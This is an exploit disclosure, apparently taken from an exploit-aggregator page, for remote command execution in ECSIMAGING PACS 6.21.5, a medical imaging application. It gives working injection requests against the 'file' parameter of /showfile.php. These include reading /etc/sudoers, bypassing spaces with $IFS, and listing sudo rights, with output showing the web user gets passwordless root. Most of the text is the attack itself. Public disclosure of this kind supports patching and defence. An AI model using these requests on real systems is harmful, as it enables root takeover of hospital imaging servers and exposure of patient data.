Exploit for ECSIMAGING PACS 6.21.5 Remote Code Execution

Name: Exploit for ECSIMAGING PACS 6.21.5 Remote Code Execution
Rating: 5 (127 reviews)

2021-01-07 | CVSS 0.5

## https://sploitus.com/exploit?id=PACKETSTORM:160847
# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution  
# Date: 06/01/2021  
# Exploit Author: shoxxdj  
# Vendor Homepage: https://www.medicalexpo.fr/  
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )  
# Tested on: Linux  
  
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.  
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.  
www-data user has sudo NOPASSWD access :  
  
/showfile.php?file=/etc/sudoers  
[...]  
www-data ALL=NOPASSWD: ALL  
[...]  
  
Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/  
  
/showfile.php?file=;sudo$IFS-l  
[...]  
User www-data may run the following commands on this host:  
(root) NOPASSWD: ALL  
[...]